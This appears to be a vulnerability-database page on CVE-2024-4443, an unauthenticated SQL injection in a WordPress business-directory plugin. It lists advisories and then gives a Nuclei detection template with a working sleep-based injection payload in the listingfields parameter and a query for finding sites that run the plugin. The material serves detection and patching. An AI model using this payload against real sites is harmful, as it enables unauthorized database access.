| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2024-4443 | 26 May 202416:38 | – | circl | |
| CVE-2024-4443 | 22 May 202405:32 | – | cve | |
| CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - Unauthenticated SQL Injection via listingfields Parameter | 22 May 202405:32 | – | cvelist | |
| Exploit for SQL Injection in Businessdirectoryplugin Business_Directory | 26 May 202416:34 | – | githubexploit | |
| CVE-2024-4443 | 22 May 202406:15 | – | nvd | |
| CVE-2024-4443 | 22 May 202406:15 | – | osv | |
| WordPress Business Directory plugin <= 6.4.2 - Unauthenticated SQL Injection via listingfields Parameter vulnerability | 22 May 202401:07 | – | patchstack | |
| WordPress Business Directory Plugin Plugin <= 6.4.2 is vulnerable to SQL Injection | 22 May 202400:00 | – | patchstack | |
| PT-2024-31151 · WordPress · The Business Directory Plugin | 22 May 202400:00 | – | ptsecurity | |
| CVE-2024-4443 | 5 Feb 202500:18 | – | redhatcve |
id: CVE-2024-4443
info:
name: Business Directory Plugin <= 6.4.2 - SQL Injection
author: s4e-io
severity: critical
description: |
The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
impact: |
Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: |
Fixed in 6.4.3.
reference:
- https://plugins.trac.wordpress.org/browser/business-directory-plugin/trunk/includes/fields/class-fieldtypes-select.php#L110
- https://plugins.trac.wordpress.org/changeset/3089626/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/982fb304-08d6-4195-97a3-f18e94295492?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-4443
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-4443
epss-score: 0.10272
epss-percentile: 0.95129
cpe: cpe:2.3:a:businessdirectoryplugin:business_directory:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/business-directory-plugin/"
product: business_directory
vendor: businessdirectoryplugin
tags: time-based-sqli,cve,cve2024,sqli,business-directory,wordpress,wp-plugin,vuln,vkev
http:
- raw:
- |
@timeout: 20s
POST /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1]= HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- "status_code == 200"
- 'contains_all(body,"Business Directory","No listings found")'
condition: and
# digest: 490a0046304402203c5752b7628bc78b1035eae0e835e0c5d3c4b3b2f0901de73543ad0d29ab081602206f4f8ead4fde31810c34da1a6e05ce0a82c1ea7500c1c9492606f1f01e53be05:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation